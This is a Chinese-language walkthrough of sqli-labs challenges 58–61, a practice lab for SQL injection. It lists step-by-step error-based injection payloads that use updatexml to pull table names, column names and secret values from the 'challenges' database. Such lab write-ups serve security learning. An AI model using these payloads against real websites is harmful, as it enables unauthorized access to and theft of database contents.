sqli-labs(58-61)-challenges-报错注入
58 5步内获得flag-报错注入-单引号
5步内获取flag?有点太高估我的能力了吧🤣
1.id=2 and 1=2
显示,不是数字型
2.?id=2'
报错了,报错注入
3.获取表名
?id=2' and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1)--+
4.获取字段
?id=2' and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='exh9led8ch'),0x7e),1)--+
5.获取flag
?id=2' and updatexml(1,concat(0x7e,(select secret_M7Y7 from exh9led8ch),0x7e),1)--+
59 5步内获得flag--报错注入-数字型
1.?id=2 and 1=2
不显示,数字型
2.?id=2 order by 4
报错,采用爆错注入
3.获取表名
?id=2 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1)--+
4.获得字段名
?id=2 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='con1m2e31e'),0x7e),1)--+
5.获得密码
?id=2 and updatexml(1,concat(0x7e,(select secret_RG1Y from con1m2e31e),0x7e),1)--+
60 5步获取flag-报错注入-双引号-括号
1.?id=2 and 1=2
显示,不是数字型
2.?id=2"
报错,还有括号,报错注入
3.获取表名
?id=2") and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1) --+
4.获取字段名
?id=2") and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='kd8yawz9zp'),0x7e),1) --+
5.获取flag
?id=2") and updatexml(1,concat(0x7e,(select secret_HGKZ from kd8yawz9zp),0x7e),1) --+
61 5步内获得flag-报错注入-单引号-双括号
1.?id=2 and 1=2
正常显示,不是数字型
2.?id=2'
报错,双括号,太坏了
3.获取表名
?id=2')) and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1) --+
4.获取字段名
?id=2')) and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='tsz8s22vir'),0x7e),1) --+
5.获取flag
?id=2')) and updatexml(1,concat(0x7e,(select secret_7PXI from tsz8s22vir),0x7e),1) --+